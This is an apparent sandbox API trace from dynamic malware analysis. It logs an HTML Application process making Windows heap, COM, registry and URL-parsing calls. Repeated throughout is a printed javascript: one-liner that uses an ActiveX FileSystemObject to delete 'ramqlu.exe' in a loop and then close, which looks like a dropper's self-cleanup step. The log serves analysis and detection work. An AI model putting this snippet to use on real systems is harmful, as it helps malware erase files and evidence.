0x44c870 [0066.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x44c8b0 [0066.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433618 [0066.195] IUnknown:AddRef (This=0x442fc8) returned 0x0 [0066.195] IUnknown:Release (This=0x442fc8) returned 0x1 [0066.195] IUnknown:Release (This=0x75028cb0) returned 0x1 [0066.195] IUnknown:QueryInterface (in: This=0x442fc8, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x46)), ppvObject=0x2cfa24 | out: ppvObject=0x2cfa24*=0x442fc8) returned 0x0 [0066.195] IUnknown:Release (This=0x442fc8) returned 0x1 [0066.195] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x42d1b0 [0066.235] IUnknown_QueryService (in: punk=0x750296a4, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x443020 | out: ppvOut=0x443020*=0x0) returned 0x80004005 [0066.235] IUnknown:QueryInterface (in: This=0x750296a4, riid=0x773042d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf9a0 | out: ppvObject=0x2cf9a0*=0x750296b8) returned 0x0 [0066.235] IServiceProvider:QueryService (in: This=0x750296b8, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x443020 | out: ppvObject=0x443020*=0x0) returned 0x80004005 [0066.235] IUnknown:Release (This=0x750296b8) returned 0x1 [0066.235] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x34) returned 0x44c8f0 [0066.235] IInternetSecurityManager:SetSecuritySite (This=0x444c48, pSite=0x443704) returned 0x0 [0066.235] IUnknown:Release (This=0x443704) returned 0x0 [0066.235] IUnknown:AddRef (This=0x443704) returned 0x28 [0066.235] IUnknown:QueryInterface (in: This=0x443704, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf9d8 | out: ppvObject=0x2cf9d8*=0x443708) 
returned 0x0 [0066.236] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x444c70 | out: ppvObject=0x444c70*=0x0) returned 0x80004002 [0066.236] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x444c6c | out: ppvObject=0x444c6c*=0x0) returned 0x80004002 [0066.236] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x444c68 | out: ppvObject=0x444c68*=0x750296bc) returned 0x0 [0066.236] IUnknown:Release (This=0x443708) returned 0x0 [0066.236] CoTaskMemAlloc (cb=0x6d) returned 0x44c930 [0066.236] CoTaskMemAlloc (cb=0x9) returned 0x43fa40 [0066.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43fa58 [0066.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44c9a8 [0066.240] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0066.240] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x44) returned 0x4294f0 [0066.241] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43fa70 [0066.241] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa88 
[0066.243] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x43baf0 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4458f8 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x43faa0 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x94) returned 0x44ca00 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x44caa0 [0066.244] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x44cae0 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x44cb58 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8b4) returned 0x44cc58 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fab8 [0066.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fad0 [0066.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x84) returned 0x44d518 [0066.335] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x800) returned 0x44d5a8 [0066.335] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x800) returned 0x44ddb0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x44e5b8 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x800) returned 0x44e610 [0066.336] IsCharSpaceW (wch=0x48) returned 0 [0066.336] IsCharAlphaNumericW (ch=0x5c) returned 0 [0066.336] IsCharSpaceW (wch=0x5c) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x433638 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44ee18 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433658 [0066.336] IsCharSpaceW (wch=0x41) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43fae8 [0066.336] 
IsCharAlphaNumericW (ch=0x20) returned 0 [0066.336] IsCharSpaceW (wch=0x20) returned 1 [0066.336] IsCharSpaceW (wch=0x7b) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445920 [0066.336] IsCharSpaceW (wch=0x20) returned 1 [0066.336] IsCharAlphaNumericW (ch=0x7b) returned 0 [0066.336] IsCharSpaceW (wch=0x62) returned 0 [0066.336] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ee18 | out: hHeap=0x410000) returned 1 [0066.336] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.336] IsCharSpaceW (wch=0x3a) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445948 [0066.412] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.412] IsCharSpaceW (wch=0x75) returned 0 [0066.412] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.412] IsCharSpaceW (wch=0x28) returned 0 [0066.412] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.412] IsCharSpaceW (wch=0x23) returned 0 [0066.412] IsCharSpaceW (wch=0x23) returned 0 [0066.412] IsCharSpaceW (wch=0x7d) returned 0 [0066.412] IsCharAlphaNumericW (ch=0x7d) returned 0 [0066.412] IsCharSpaceW (wch=0x29) returned 0 [0066.412] IsCharSpaceW (wch=0x75) returned 0 [0066.413] IsCharSpaceW (wch=0x75) returned 0 [0066.413] IsCharSpaceW (wch=0x29) returned 0 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433698 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x44f020 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x424218 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fb00 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fb18 [0066.413] CoTaskMemFree (pv=0x44c930) [0066.413] CoTaskMemFree (pv=0x43fa40) [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x4336b8 [0066.413] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0066.413] GetProcAddress 
(hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0066.414] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0066.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x340) returned 0x44f060 [0066.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a) returned 0x44f3c0 [0066.414] IsOS (dwOS=0x25) returned 1 [0066.414] GetSysColor (nIndex=26) returned 0xcc6600 [0066.414] IsOS (dwOS=0x25) returned 1 [0066.414] GetSysColor (nIndex=5) returned 0xffffff [0066.414] GetSysColor (nIndex=8) returned 0x0 [0066.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa40 [0066.476] wcstol (in: _String="0,0,255", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",0,255") returned 0 [0066.476] wcstol (in: _String="0,255", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",255") returned 0 [0066.476] wcstol (in: _String="255", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*="") returned 255 [0066.476] wcstol (in: _String="128,0,128", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",0,128") returned 128 [0066.476] wcstol (in: _String="0,128", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",128") returned 0 [0066.476] wcstol (in: _String="128", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*="") returned 128 [0066.479] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0066.479] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0066.480] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf6ec | out: phkResult=0x2cf6ec*=0xa8) returned 0x0 [0066.480] SHGetValueW (in: hkey=0xa8, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x2cf6f0, pcbData=0x2cf6e8*=0xa | out: pdwType=0x0, pvData=0x2cf6f0, 
pcbData=0x2cf6e8*=0xa) returned 0x2 [0066.480] RegCloseKey (hKey=0xa8) returned 0x0 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4513a8 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa28 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3a) returned 0x4242a8 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6a) returned 0x451830 [0066.520] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x424888 [0066.520] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x26) returned 0x42d1e0 [0066.520] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6e) returned 0x4518a8 [0066.520] GetProcessHeap () returned 0x410000 [0066.520] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c930 | out: hHeap=0x410000) returned 1 [0066.520] GetProcessHeap () returned 0x410000 [0066.520] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4503c0 | out: hHeap=0x410000) returned 1 [0066.521] GetProcessHeap () returned 0x410000 [0066.521] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43bb00 | out: hHeap=0x410000) returned 1 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4336d8 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4248b8 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4336f8 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4242f0 [0066.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x44c930 [0066.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x42d210 [0066.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445998 [0066.523] GetAcceptLanguagesW () returned 0x0 [0066.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x424a98 [0066.523] GetClassNameW (in: hWnd=0x3017c, lpClassName=0x2cf9bc, nMaxCount=10 | 
out: lpClassName="HTML Appl") returned 9 [0066.523] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.523] GetParent (hWnd=0x3017c) returned 0x4015e [0066.523] GetClassNameW (in: hWnd=0x4015e, lpClassName=0x2cf9bc, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.523] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.523] GetParent (hWnd=0x4015e) returned 0x0 [0066.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x433718 [0066.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x42d240 [0066.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x433718 | out: hHeap=0x410000) returned 1 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f418 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x451490 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x94) returned 0x451920 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x433718 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 0x433738 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x433758 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x4514a8 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x4514c0 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x4514d8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x4514f0 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x4459c0 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x4459e8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x445a10 [0066.599] 
RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x433778 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x433798 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x4337b8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x4337d8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x451508 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x451538 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x451550 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x4337f8 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x451568 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x451580 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x26) returned 0x42d270 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a38 | out: hHeap=0x410000) returned 1 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a60 | out: hHeap=0x410000) returned 1 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a88 | out: hHeap=0x410000) returned 1 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424858 | out: hHeap=0x410000) returned 1 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451508 | out: hHeap=0x410000) returned 1 [0066.601] IMoniker:GetDisplayName (in: This=0x4206a8, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x2cf980 | out: ppszDisplayName=0x2cf980*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.601] IUnknown:QueryInterface 
(in: This=0x4206a8, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x2cf958 | out: ppvObject=0x2cf958*=0x4206b4) returned 0x0 [0066.601] IUriContainer:GetIUri (in: This=0x4206b4, ppIUri=0x2cf988 | out: ppIUri=0x2cf988*=0x43c254) returned 0x0 [0066.601] IUnknown:Release (This=0x4206b4) returned 0x1 [0066.601] IUnknown:AddRef (This=0x4206a8) returned 0x2 [0066.601] IUnknown:AddRef (This=0x43c254) returned 0x5 [0066.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.601] IMoniker:GetDisplayName (in: This=0x4206a8, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x2cf860 | out: ppszDisplayName=0x2cf860*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.601] UrlGetLocationW (psz1="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.601] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppmk=0x2cf82c*=0x0, dwFlags=0x1 | out: ppmk=0x2cf82c*=0x4503c0) returned 0x0 [0066.602] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf370 | out: ppv=0x2cf370*=0x75028d20) returned 0x0 [0066.602] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, 
[2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf45c | out: ppvObject=0x2cf45c*=0x75028d2c) returned 0x0 [0066.602] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.603] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x451c00, cchResult=0x824, pcchResult=0x2cf770, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cf770*=0x0) returned 0x800c0011 [0066.603] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.603] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2cf824 | out: ppURI=0x2cf824*=0x43bfcc) returned 0x0 [0066.603] IUri:GetScheme (in: This=0x43bfcc, pdwScheme=0x2cf7bc | out: pdwScheme=0x2cf7bc*=0xf) returned 0x0 [0066.603] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0066.604] IUnknown:QueryInterface (in: This=0x43bfcc, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf7c4 | out: ppvObject=0x2cf7c4*=0x43bfcc) returned 0x0 [0066.604] IUnknown:Release (This=0x43bfcc) returned 0x2 [0066.604] IUnknown:AddRef (This=0x43bfcc) returned 0x3 [0066.604] IUnknown:Release (This=0x43bfcc) returned 0x2 [0066.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x445a88 [0066.604] IUnknown:AddRef (This=0x43bfcc) returned 0x3 [0066.604] IUri:GetAbsoluteUri (in: This=0x43bfcc, pbstrAbsoluteUri=0x445a88 | out: pbstrAbsoluteUri=0x445a88*="javascript:o=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.604] IUnknown:Release (This=0x43bfcc) returned 0x2 [0066.604] IUnknown:AddRef (This=0x4503c0) returned 0x2 [0066.604] IUnknown:Release (This=0x4503c0) returned 0x1 [0066.604] IUnknown:AddRef (This=0x4206a8) returned 0x3 [0066.604] IUnknown:Release (This=0x4503c0) returned 0x0 [0066.604] IUnknown:AddRef (This=0x4206a8) returned 0x4 [0066.604] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf62c | out: ppvObject=0x2cf62c*=0x43c254) returned 0x0 [0066.604] IUnknown:Release (This=0x43c254) returned 0x5 [0066.604] IUnknown:AddRef (This=0x43c254) returned 0x6 [0066.604] IUnknown:QueryInterface (in: This=0x4206a8, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x2cf600 | out: ppvObject=0x2cf600*=0x4206b4) returned 0x0 [0066.605] IUriContainer:GetIUri (in: This=0x4206b4, ppIUri=0x2cf654 | out: ppIUri=0x2cf654*=0x43c254) returned 0x0 [0066.605] IUnknown:Release (This=0x4206b4) returned 0x4 [0066.605] IUnknown:AddRef (This=0x4206a8) returned 0x5 [0066.605] IUnknown:Release (This=0x4206a8) returned 0x4 [0066.605] IUnknown:AddRef (This=0x43c254) returned 0x8 [0066.605] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf62c | out: ppvObject=0x2cf62c*=0x43c254) returned 0x0 [0066.605] IUnknown:Release (This=0x43c254) returned 0x8 [0066.605] IUnknown:AddRef (This=0x43c254) returned 0x9 [0066.605] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf624 | out: pdwScheme=0x2cf624*=0xf) returned 0x0 [0066.605] 
RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc8) returned 0x451c00 [0066.605] GetCurrentProcessId () returned 0x358 [0066.605] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf62c | out: ppvObject=0x2cf62c*=0x43c254) returned 0x0 [0066.605] IUnknown:Release (This=0x43c254) returned 0x9 [0066.605] IUnknown:AddRef (This=0x43c254) returned 0xa [0066.605] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf5fc | out: pdwScheme=0x2cf5fc*=0xf) returned 0x0 [0066.605] IUri:GetAbsoluteUri (in: This=0x43c254, pbstrAbsoluteUri=0x2cf62c | out: pbstrAbsoluteUri=0x2cf62c*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.606] GetProcAddress (hModule=0x76e40000, lpProcName=0x7) returned 0x76e44680 [0066.606] SysStringLen (param_1="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x8b [0066.606] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2cf648 | out: ppURI=0x2cf648*=0x43bfcc) returned 0x0 [0066.606] IUnknown:Release (This=0x43c254) returned 0x9 [0066.606] IUri:GetScheme (in: This=0x43bfcc, pdwScheme=0x2cf5dc | out: pdwScheme=0x2cf5dc*=0xf) returned 0x0 [0066.606] IUnknown:QueryInterface (in: This=0x43bfcc, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf5e4 | out: ppvObject=0x2cf5e4*=0x43bfcc) returned 0x0 [0066.606] IUnknown:Release (This=0x43bfcc) returned 0x3 [0066.606] IUnknown:AddRef 